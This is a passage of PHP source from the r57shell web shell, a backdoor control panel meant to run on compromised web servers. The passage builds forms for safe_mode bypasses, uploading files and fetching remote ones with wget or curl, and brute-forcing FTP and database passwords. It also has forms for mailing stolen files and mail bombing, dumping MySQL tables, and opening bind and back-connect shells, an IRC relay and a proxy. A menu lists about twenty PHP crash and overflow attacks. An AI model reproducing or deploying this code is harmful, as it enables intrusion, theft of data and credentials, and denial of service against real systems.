'_text116'] . $arrow . "", in('text', 'test11_file', 96, (!empty($_POST['test11_file']) ? ($_POST['test11_file']) : ("/tmp/test.zip"))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test11') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt8'])); echo $te . '' . $table_end1 . $fe; } if (($safe_mode || $open_basedir) && @version_compare(@phpversion(), "5.2.2") <= 0) { echo $fs . $table_up1 . div_title($lang[$language . '_text123'], 'id26') . $table_up2 . div('id26') . $ts; echo sr(15, "" . $lang[$language . '_text116'] . $arrow . "", in('text', 'test12_file', 96, (!empty($_POST['test12_file']) ? ($_POST['test12_file']) : ("/tmp/test.bzip"))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test12') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt8'])); echo $te . '' . $table_end1 . $fe; } if (($safe_mode || $open_basedir) && @function_exists('error_log') && @version_compare(@phpversion(), "5.2.2") <= 0) { echo $fs . $table_up1 . div_title($lang[$language . '_text124'], 'id27') . $table_up2 . div('id27') . $ts; echo sr(15, "" . $lang[$language . '_text65'] . " " . $lang[$language . '_text59'] . $arrow . "", in('text', 'test13_file2', 96, (!empty($_POST['test13_file2']) ? ($_POST['test13_file2']) : ($dir . "/shell.php"))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test13')); echo sr(15, "" . $lang[$language . '_text125'] . $arrow . "", in('text', 'test13_file1', 96, (!empty($_POST['test13_file1']) ? ($_POST['test13_file1']) : (" "))) . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt10'])); echo $te . '' . $table_end1 . $fe; } if (($safe_mode || $open_basedir) && @version_compare(@phpversion(), "5.2.2") <= 0) { echo $fs . $table_up1 . div_title($lang[$language . '_text126'], 'id28') . $table_up2 . div('id28') . $ts; echo sr(15, "" . $lang[$language . '_text4'] . $arrow . "", in('text', 'test14_file2', 96, (!empty($_POST['test14_file2']) ? ($_POST['test14_file2']) : ($dir))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test14')); echo sr(15, "" . $lang[$language . '_text125'] . $arrow . "", in('text', 'test14_file1', 96, (!empty($_POST['test14_file1']) ? ($_POST['test14_file1']) : (" "))) . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt10'])); echo $te . '' . $table_end1 . $fe; } if (($safe_mode || $open_basedir) && @function_exists('readfile') && @version_compare(@phpversion(), "5.2.2") <= 0) { echo $fs . $table_up1 . div_title($lang[$language . '_text127'], 'id29') . $table_up2 . div('id29') . $ts; echo sr(15, "" . $lang[$language . '_text65'] . " " . $lang[$language . '_text59'] . $arrow . "", in('text', 'test15_file2', 96, (!empty($_POST['test15_file2']) ? ($_POST['test15_file2']) : ($dir . "/shell.php"))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test15')); echo sr(15, "" . $lang[$language . '_text125'] . $arrow . "", in('text', 'test15_file1', 96, (!empty($_POST['test15_file1']) ? ($_POST['test15_file1']) : (" "))) . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt10'])); echo $te . '' . $table_end1 . $fe; } if (($safe_mode || $open_basedir) && @version_compare(@phpversion(), "5.2.4") <= 0) { echo $fs . $table_up1 . div_title($lang[$language . '_text129'], 'id16') . $table_up2 . div('id16') . $ts; echo sr(15, "" . $lang[$language . '_text65'] . " " . $lang[$language . '_text59'] . $arrow . "", in('text', 'test16_file', 96, (!empty($_POST['test16_file']) ? ($_POST['test16_file']) : ($dir . "/test.php"))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test16') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt8'])); echo $te . '' . $table_end1 . $fe; } if (($safe_mode || $open_basedir) && @function_exists('symlink') && @version_compare(@phpversion(), "5.2.2") <= 0) { echo $table_up1 . div_title($lang[$language . '_text131'], 'id17') . $table_up2 . div('id17') . $ts; echo ""; echo $te . '' . $table_end1; } if (($safe_mode || $open_basedir) && @function_exists('symlink') && @version_compare(@phpversion(), "5.2.2") <= 0) { echo $table_up1 . div_title($lang[$language . '_text132'], 'id18') . $table_up2 . div('id18') . $ts; echo ""; echo $te . '' . $table_end1; } if ((!@function_exists('ini_get')) || @ini_get('file_uploads')) { echo ""; echo $table_up1 . div_title($lang[$language . '_text5'], 'id30') . $table_up2 . div('id30') . $ts; echo sr(15, "" . $lang[$language . '_text6'] . $arrow . "", in('file', 'userfile0', 85, '')); echo sr(15, "" . $lang[$language . '_text21'] . $arrow . "", in('checkbox', 'nf1 id=nf1', 0, '1') . in('text', 'new_name', 82, '') . in('hidden', 'dir', 0, $dir) . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt2'])); echo $te . '' . $table_end1 . $fe; } if ((!@function_exists('ini_get')) || @ini_get('file_uploads')) { echo ""; echo $table_up1 . div_title('Multy ' . $lang[$language . '_text5'], 'id34') . $table_up2 . div('id34') . $ts; echo ""; echo $te . '' . $table_end1 . $fe; } $select = ''; if ((!@function_exists('ini_get')) || (@ini_get('allow_url_fopen') && @function_exists('fopen'))) { $select = ""; } if (!$safe_mode) { if (which('wget')) { $select.= ""; } if (which('fetch')) { $select.= ""; } if (which('lynx')) { $select.= ""; } if (which('links')) { $select.= ""; } if (which('curl')) { $select.= ""; } if (which('GET')) { $select.= ""; } } if ($select) { echo $fs . $table_up1 . div_title($lang[$language . '_text15'], 'id31') . $table_up2 . div('id31') . $ts; echo sr(15, "" . $lang[$language . '_text16'] . $arrow . "", "" . in('hidden', 'dir', 0, $dir) . ws(2) . "" . $lang[$language . '_text17'] . $arrow . "" . in('text', 'rem_file', 78, 'http://')); echo sr(15, "" . $lang[$language . '_text18'] . $arrow . "", in('text', 'loc_file', 105, $dir) . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt2'])); echo $te . '' . $table_end1 . $fe; } echo $fs . $table_up1 . div_title($lang[$language . '_text86'], 'id32') . $table_up2 . div('id32') . $ts; echo sr(15, "" . $lang[$language . '_text59'] . $arrow . "", in('text', 'd_name', 85, $dir) . in('hidden', 'cmd', 0, 'download_file') . in('hidden', 'dir', 0, $dir) . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt14'])); $arh = $lang[$language . '_text92']; if (@function_exists('gzcompress')) { $arh.= in('radio', 'compress', 0, 'zip') . ' zip'; } if (@function_exists('gzencode')) { $arh.= in('radio', 'compress', 0, 'gzip') . ' gzip'; } if (@function_exists('bzcompress')) { $arh.= in('radio', 'compress', 0, 'bzip') . ' bzip'; } echo sr(15, "" . $lang[$language . '_text91'] . $arrow . "", in('radio', 'compress', 0, 'none', 1) . ' ' . $arh); echo $te . '' . $table_end1 . $fe; if (@function_exists("ftp_connect")) { echo $table_up1 . div_title($lang[$language . '_text93'], 'id33') . $table_up2 . div('id33') . $ts . "" . $fs . "" . $fe . $fs . "" . $fe . $fs . "" . $fe . "
" . $ts; echo sr(20, "" . $lang[$language . '_text30'] . $arrow . "", $fs . in('text', 'test17_file', 60, (!empty($_POST['test17_file']) ? ($_POST['test17_file']) : ("/etc/passwd"))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test17_1') . in('submit', 'submit', 0, $lang[$language . '_text136']) . $fe); echo $te . "" . $ts; echo sr(0, "", $fs . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test17_2') . in('submit', 'submit', 0, $lang[$language . '_butt8']) . $fe); echo $te . "
" . $ts; echo sr(20, "" . $lang[$language . '_text4'] . $arrow . "", $fs . in('text', 'test17_file', 60, (!empty($_POST['test17_file']) ? ($_POST['test17_file']) : ($dir))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test17_1') . in('submit', 'submit', 0, $lang[$language . '_text136']) . $fe); echo $te . "" . $ts; echo sr(0, "", $fs . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test17_3') . in('submit', 'submit', 0, $lang[$language . '_butt8']) . $fe); echo $te . "
" . $ts; echo sr(15, "" . $lang[$language . '_text6'] . $arrow . "", in('file', 'userfile1', 35, '')); echo sr(15, "" . $lang[$language . '_text6'] . $arrow . "", in('file', 'userfile2', 35, '')); echo sr(15, "" . $lang[$language . '_text6'] . $arrow . "", in('file', 'userfile3', 35, '')); echo sr(15, "" . $lang[$language . '_text6'] . $arrow . "", in('file', 'userfile4', 35, '')); echo sr(15, "" . $lang[$language . '_text6'] . $arrow . "", in('file', 'userfile5', 35, '')); echo sr(15, "" . $lang[$language . '_text6'] . $arrow . "", in('file', 'userfile6', 35, '')); echo sr(15, "" . $lang[$language . '_text6'] . $arrow . "", in('file', 'userfile7', 35, '')); echo sr(15, "" . $lang[$language . '_text6'] . $arrow . "", in('file', 'userfile8', 35, '')); echo $te . "" . $ts; echo sr(15, "" . $lang[$language . '_text6'] . $arrow . "", in('file', 'userfile9', 35, '')); echo sr(15, "" . $lang[$language . '_text6'] . $arrow . "", in('file', 'userfile10', 35, '')); echo sr(15, "" . $lang[$language . '_text6'] . $arrow . "", in('file', 'userfile11', 35, '')); echo sr(15, "" . $lang[$language . '_text6'] . $arrow . "", in('file', 'userfile12', 35, '')); echo sr(15, "" . $lang[$language . '_text6'] . $arrow . "", in('file', 'userfile13', 35, '')); echo sr(15, "" . $lang[$language . '_text6'] . $arrow . "", in('file', 'userfile14', 35, '')); echo sr(15, "" . $lang[$language . '_text6'] . $arrow . "", in('file', 'userfile15', 35, '')); echo sr(15, '', in('hidden', 'dir', 0, $dir) . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt2'])); echo $te . "
" . $ts; echo "
" . $lang[$language . '_text94'] . "
"; echo sr(25, "" . $lang[$language . '_text88'] . $arrow . "", in('text', 'ftp_server_port', 20, (!empty($_POST['ftp_server_port']) ? ($_POST['ftp_server_port']) : (""))) . in('hidden', 'cmd', 0, 'ftp_brute') . in('hidden', 'dir', 0, $dir)); echo sr(25, "", in('radio', 'brute_method', 0, 'passwd', 1) . "" . $lang[$language . '_text99'] . " ( " . $lang[$language . '_text95'] . " )"); echo sr(25, "", in('checkbox', 'reverse id=reverse', 0, '1', 1) . $lang[$language . '_text101']); echo sr(25, "", in('radio', 'brute_method', 0, 'dic', 0) . $lang[$language . '_text135']); echo sr(25, "" . $lang[$language . '_text37'] . $arrow . "", in('text', 'ftp_login', 0, (!empty($_POST['ftp_login']) ? ($_POST['ftp_login']) : ("root")))); echo sr(25, "" . $lang[$language . '_text135'] . $arrow . "", in('text', 'dictionary', 0, (!empty($_POST['dictionary']) ? ($_POST['dictionary']) : ($dir . '/passw.dic')))); echo sr(25, "", in('submit', 'submit', 0, $lang[$language . '_butt1'])); echo $te . "
" . $ts; echo "
" . $lang[$language . '_text87'] . "
"; echo sr(25, "" . $lang[$language . '_text88'] . $arrow . "", in('text', 'ftp_server_port', 20, (!empty($_POST['ftp_server_port']) ? ($_POST['ftp_server_port']) : ("")))); echo sr(25, "" . $lang[$language . '_text37'] . $arrow . "", in('text', 'ftp_login', 20, (!empty($_POST['ftp_login']) ? ($_POST['ftp_login']) : ("anonymous")))); echo sr(25, "" . $lang[$language . '_text38'] . $arrow . "", in('text', 'ftp_password', 20, (!empty($_POST['ftp_password']) ? ($_POST['ftp_password']) : ("billy@microsoft.com")))); echo sr(25, "" . $lang[$language . '_text89'] . $arrow . "", in('text', 'ftp_file', 20, (!empty($_POST['ftp_file']) ? ($_POST['ftp_file']) : ("/ftp-dir/file"))) . in('hidden', 'cmd', 0, 'ftp_file_down')); echo sr(25, "" . $lang[$language . '_text18'] . $arrow . "", in('text', 'loc_file', 20, $dir)); echo sr(25, "" . $lang[$language . '_text90'] . $arrow . "", "" . in('hidden', 'dir', 0, $dir)); echo sr(25, "", in('submit', 'submit', 0, $lang[$language . '_butt14'])); echo $te . "
" . $ts; echo "
" . $lang[$language . '_text100'] . "
"; echo sr(25, "" . $lang[$language . '_text88'] . $arrow . "", in('text', 'ftp_server_port', 20, (!empty($_POST['ftp_server_port']) ? ($_POST['ftp_server_port']) : ("")))); echo sr(25, "" . $lang[$language . '_text37'] . $arrow . "", in('text', 'ftp_login', 20, (!empty($_POST['ftp_login']) ? ($_POST['ftp_login']) : ("anonymous")))); echo sr(25, "" . $lang[$language . '_text38'] . $arrow . "", in('text', 'ftp_password', 20, (!empty($_POST['ftp_password']) ? ($_POST['ftp_password']) : ("billy@microsoft.com")))); echo sr(25, "" . $lang[$language . '_text18'] . $arrow . "", in('text', 'loc_file', 20, $dir)); echo sr(25, "" . $lang[$language . '_text89'] . $arrow . "", in('text', 'ftp_file', 20, (!empty($_POST['ftp_file']) ? ($_POST['ftp_file']) : ("/ftp-dir/file"))) . in('hidden', 'cmd', 0, 'ftp_file_up')); echo sr(25, "" . $lang[$language . '_text90'] . $arrow . "", "" . in('hidden', 'dir', 0, $dir)); echo sr(25, "", in('submit', 'submit', 0, $lang[$language . '_butt2'])); echo $te . "
"; } if (@function_exists("mail")) { echo $table_up1 . div_title($lang[$language . '_text102'], 'id35') . $table_up2 . div('id35') . $ts . "" . $fs . "" . $ts; echo "
" . $lang[$language . '_text103'] . "
"; echo sr(25, "" . $lang[$language . '_text105'] . $arrow . "", in('text', 'to', 30, (!empty($_POST['to']) ? ($_POST['to']) : ("hacker@mail.com"))) . in('hidden', 'cmd', 0, 'mail') . in('hidden', 'dir', 0, $dir)); echo sr(25, "" . $lang[$language . '_text106'] . $arrow . "", in('text', 'from', 30, (!empty($_POST['from']) ? ($_POST['from']) : ("billy@microsoft.com")))); echo sr(25, "" . $lang[$language . '_text107'] . $arrow . "", in('text', 'subj', 30, (!empty($_POST['subj']) ? ($_POST['subj']) : ("hello billy")))); echo sr(25, "" . $lang[$language . '_text108'] . $arrow . "", ''); echo sr(25, "", in('submit', 'submit', 0, $lang[$language . '_butt15'])); echo $te . "" . $fe . $fs . "" . $ts; echo "
" . $lang[$language . '_text104'] . "
"; echo sr(25, "" . $lang[$language . '_text105'] . $arrow . "", in('text', 'to', 30, (!empty($_POST['to']) ? ($_POST['to']) : ("hacker@mail.com"))) . in('hidden', 'cmd', 0, 'mail_file') . in('hidden', 'dir', 0, $dir)); echo sr(25, "" . $lang[$language . '_text106'] . $arrow . "", in('text', 'from', 30, (!empty($_POST['from']) ? ($_POST['from']) : ("billy@microsoft.com")))); echo sr(25, "" . $lang[$language . '_text107'] . $arrow . "", in('text', 'subj', 30, (!empty($_POST['subj']) ? ($_POST['subj']) : ("file from r57shell")))); echo sr(25, "" . $lang[$language . '_text18'] . $arrow . "", in('text', 'loc_file', 30, $dir)); echo sr(25, "" . $lang[$language . '_text91'] . $arrow . "", in('radio', 'compress', 0, 'none', 1) . ' ' . $arh); echo sr(25, "", in('submit', 'submit', 0, $lang[$language . '_butt15'])); echo $te . "" . $fe . $fs . "" . $ts; echo "
" . $lang[$language . '_text139'] . "
"; echo sr(25, "" . $lang[$language . '_text105'] . $arrow . "", in('text', 'to', 30, (!empty($_POST['to']) ? ($_POST['to']) : ("hacker@mail.com"))) . in('hidden', 'cmd', 0, 'mail_bomber') . in('hidden', 'dir', 0, $dir)); echo sr(25, "" . $lang[$language . '_text106'] . $arrow . "", in('text', 'from', 30, (!empty($_POST['from']) ? ($_POST['from']) : ("billy@microsoft.com")))); echo sr(25, "" . $lang[$language . '_text107'] . $arrow . "", in('text', 'subj', 30, (!empty($_POST['subj']) ? ($_POST['subj']) : ("hello billy")))); echo sr(25, "" . $lang[$language . '_text108'] . $arrow . "", ''); echo sr(25, "Flood" . $arrow . "", in('int', 'mail_flood', 5, (!empty($_POST['mail_flood']) ? ($_POST['mail_flood']) : 100)) . ws(4) . "Size(kb)" . $arrow . "" . in('int', 'mail_size', 5, (!empty($_POST['mail_size']) ? ($_POST['mail_size']) : 10))); echo sr(25, "", in('submit', 'submit', 0, $lang[$language . '_butt15'])); echo $te . "" . $fe . ""; } if ($mysql_on || $mssql_on || $pg_on || $ora_on) { $select = ''; echo $table_up1 . div_title($lang[$language . '_text82'], 'id36') . $table_up2 . div('id36') . $ts . "" . $fs . "" . $ts; echo "
" . $lang[$language . '_text134'] . "
"; echo sr(35, "" . $lang[$language . '_text80'] . $arrow . "", $select . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'db_brute')); echo sr(35, "" . $lang[$language . '_text111'] . $arrow . "", in('text', 'db_server', 8, (!empty($_POST['db_server']) ? ($_POST['db_server']) : ("localhost"))) . ' : ' . in('text', 'db_port', 8, (!empty($_POST['db_port']) ? ($_POST['db_port']) : ("3306")))); echo sr(35, "" . $lang[$language . '_text39'] . $arrow . "", in('text', 'mysql_db', 8, (!empty($_POST['mysql_db']) ? ($_POST['mysql_db']) : ("mysql")))); echo sr(25, "", in('radio', 'brute_method', 0, 'passwd', 1) . "" . $lang[$language . '_text99'] . " ( " . $lang[$language . '_text95'] . " )"); echo sr(25, "", in('checkbox', 'reverse id=reverse', 0, '1', 1) . $lang[$language . '_text101']); echo sr(25, "", in('radio', 'brute_method', 0, 'dic', 0) . $lang[$language . '_text135']); echo sr(35, "" . $lang[$language . '_text37'] . $arrow . "", in('text', 'mysql_l', 8, (!empty($_POST['mysql_l']) ? ($_POST['mysql_l']) : ("root")))); echo sr(25, "" . $lang[$language . '_text135'] . $arrow . "", in('text', 'dictionary', 0, (!empty($_POST['dictionary']) ? ($_POST['dictionary']) : ($dir . '/passw.dic')))); echo sr(35, "", in('submit', 'submit', 0, $lang[$language . '_butt1'])); echo $te . "" . $fe . $fs . "" . $ts; echo "
" . $lang[$language . '_text83'] . "
"; echo sr(35, "" . $lang[$language . '_text80'] . $arrow . "", $select); echo sr(35, "" . $lang[$language . '_text111'] . $arrow . "", in('text', 'db_server', 8, (!empty($_POST['db_server']) ? ($_POST['db_server']) : ("localhost"))) . ' : ' . in('text', 'db_port', 8, (!empty($_POST['db_port']) ? ($_POST['db_port']) : ("3306")))); echo sr(35, "" . $lang[$language . '_text37'] . ' : ' . $lang[$language . '_text38'] . $arrow . "", in('text', 'mysql_l', 8, (!empty($_POST['mysql_l']) ? ($_POST['mysql_l']) : ("root"))) . ' : ' . in('text', 'mysql_p', 8, (!empty($_POST['mysql_p']) ? ($_POST['mysql_p']) : ("password")))); echo sr(35, "" . $lang[$language . '_text36'] . $arrow . "", in('text', 'mysql_db', 8, (!empty($_POST['mysql_db']) ? ($_POST['mysql_db']) : ("mysql"))) . ' . ' . in('text', 'mysql_tbl', 8, (!empty($_POST['mysql_tbl']) ? ($_POST['mysql_tbl']) : ("user")))); echo sr(35, in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'mysql_dump') . "" . $lang[$language . '_text41'] . $arrow . "", in('checkbox', 'dif id=dif', 0, '1') . in('text', 'dif_name', 17, (!empty($_POST['dif_name']) ? ($_POST['dif_name']) : ("dump.sql")))); echo sr(35, "", in('submit', 'submit', 0, $lang[$language . '_butt9'])); echo $te . "" . $fe . $fs . "" . $ts; echo "
" . $lang[$language . '_text83'] . "
"; echo sr(35, "" . $lang[$language . '_text80'] . $arrow . "", $select); echo sr(35, "" . $lang[$language . '_text111'] . $arrow . "", in('text', 'db_server', 8, (!empty($_POST['db_server']) ? ($_POST['db_server']) : ("localhost"))) . ' : ' . in('text', 'db_port', 8, (!empty($_POST['db_port']) ? ($_POST['db_port']) : ("3306")))); echo sr(35, "" . $lang[$language . '_text37'] . ' : ' . $lang[$language . '_text38'] . $arrow . "", in('text', 'mysql_l', 8, (!empty($_POST['mysql_l']) ? ($_POST['mysql_l']) : ("root"))) . ' : ' . in('text', 'mysql_p', 8, (!empty($_POST['mysql_p']) ? ($_POST['mysql_p']) : ("password")))); echo sr(35, "" . $lang[$language . '_text39'] . $arrow . "", in('text', 'mysql_db', 8, (!empty($_POST['mysql_db']) ? ($_POST['mysql_db']) : ("mysql")))); echo sr(35, "" . $lang[$language . '_text84'] . $arrow . "" . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'db_query'), ""); echo $te . "

" . in('submit', 'submit', 0, $lang[$language . '_butt1']) . "
"; echo "" . $fe . ""; } if (!$safe_mode && $unix) { echo $table_up1 . div_title($lang[$language . '_text81'], 'id37') . $table_up2 . div('id37') . $ts . "" . $fs . "" . $ts; echo "
" . $lang[$language . '_text9'] . "
"; echo sr(40, "" . $lang[$language . '_text10'] . $arrow . "", in('text', 'port', 10, '11457')); echo sr(40, "" . $lang[$language . '_text11'] . $arrow . "", in('text', 'bind_pass', 10, 'r57')); echo sr(40, "" . $lang[$language . '_text20'] . $arrow . "", "" . in('hidden', 'dir', 0, $dir)); echo sr(40, "", in('submit', 'submit', 0, $lang[$language . '_butt3'])); echo $te . "" . $fe . $fs . "" . $ts; echo "
" . $lang[$language . '_text12'] . "
"; echo sr(40, "" . $lang[$language . '_text13'] . $arrow . "", in('text', 'ip', 15, ((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("")))); echo sr(40, "" . $lang[$language . '_text14'] . $arrow . "", in('text', 'port', 15, '11457')); echo sr(40, "" . $lang[$language . '_text20'] . $arrow . "", "" . in('hidden', 'dir', 0, $dir)); echo sr(40, "", in('submit', 'submit', 0, $lang[$language . '_butt4'])); echo $te . "" . $fe . $fs . "" . $ts; echo "
" . $lang[$language . '_text22'] . "
"; echo sr(40, "" . $lang[$language . '_text23'] . $arrow . "", in('text', 'local_port', 10, '11457')); echo sr(40, "" . $lang[$language . '_text24'] . $arrow . "", in('text', 'remote_host', 10, 'irc.dalnet.ru')); echo sr(40, "" . $lang[$language . '_text25'] . $arrow . "", in('text', 'remote_port', 10, '6667')); echo sr(40, "" . $lang[$language . '_text26'] . $arrow . "", "" . in('hidden', 'dir', 0, $dir)); echo sr(40, "", in('submit', 'submit', 0, $lang[$language . '_butt5'])); echo $te . "" . $fe . $fs . "" . $ts; echo "
"; echo sr(40, "" . $lang[$language . '_text10'] . $arrow . "", in('text', 'proxy_port', 10, '31337')); echo sr(40, "" . $lang[$language . '_text26'] . $arrow . "", "" . in('hidden', 'dir', 0, $dir)); echo sr(40, "", in('submit', 'submit', 0, $lang[$language . '_butt5'])); echo $te . "" . $fe . ""; } echo $table_up1 . div_title($lang[$language . '_text140'], 'id38') . $table_up2 . div('id38') . $ts . "" . $ts; echo "
" . $lang[$language . '_text141'] . "
"; echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos1') . in('submit', 'submit', 0, 'Recursive memory exhaustion') . $fe); echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos2') . in('submit', 'submit', 0, 'Memory_limit exhaustion in [ pack() ] function') . $fe); echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos3') . in('submit', 'submit', 0, 'BoF in [ unserialize() ] function') . $fe); echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos4') . in('submit', 'submit', 0, 'Limit integer calculate (65535) in ZendEngine') . $fe); echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos5') . in('submit', 'submit', 0, 'SQlite [ dl() ] vulnerability') . $fe); echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos6') . in('submit', 'submit', 0, 'PCRE [ preg_match() ] exhaustion resources (PHP <5.2.1)') . $fe); echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos7') . in('submit', 'submit', 0, 'Memory_limit exhaustion in [ str_repeat() ] function (PHP <4.4.5,5.2.1)') . $fe); echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos8') . in('submit', 'submit', 0, 'Apache process killer') . $fe); echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos9') . in('submit', 'submit', 0, 'Overload inodes from HD.I via [ tempnam() ] (PHP 4.4.2, 5.1.2)') . $fe); echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos10') . in('submit', 'submit', 0, 'BoF in [ wordwrap() ] function (PHP <4.4.2,5.1.2)') . $fe); echo $te . "" . $ts; echo "
" . $lang[$language . '_text141'] . "
"; echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos11') . in('submit', 'submit', 0, 'BoF in [ array_fill() ] function (PHP <4.4.2,5.1.2)') . $fe); echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos12') . in('submit', 'submit', 0, 'BoF in [ substr_compare() ] function (PHP <4.4.2,5.1.2)') . $fe); echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos13') . in('submit', 'submit', 0, 'Array Creation in [ unserialize() ] 64 bit function (PHP <5.2.1)') . $fe); echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos14') . in('submit', 'submit', 0, 'BoF in [ str_ireplace() ] function (PHP <5.2.x)') . $fe); echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos15') . in('submit', 'submit', 0, 'BoF in [ htmlentities() ] function (PHP <5.1.6,4.4.4)') . $fe); echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos16') . in('submit', 'submit', 0, 'Integer Overflow in [ zip_entry_read() ] function (PHP <4.4.5)') . $fe); echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos17') . in('submit', 'submit', 0, 'BoF in [ sqlite_udf_decode_binary() ] function (PHP <4.4.5,5.2.1)') . $fe); echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos18') . in('submit', 'submit', 0, 'Memory Allocation BoF in [ msg_receive() ] function (PHP <4.4.5,5.2.1)') . $fe); echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos19') . in('submit', 'submit', 0, 'Off By One in [ php_stream_filter_create() ] function (PHP 5<5.2.1)') . $fe); echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos20') . in('submit', 'submit', 0, 'Reference Counter Overflow in [ unserialize() ] function (PHP <4.4.4)') . $fe); echo $te . "";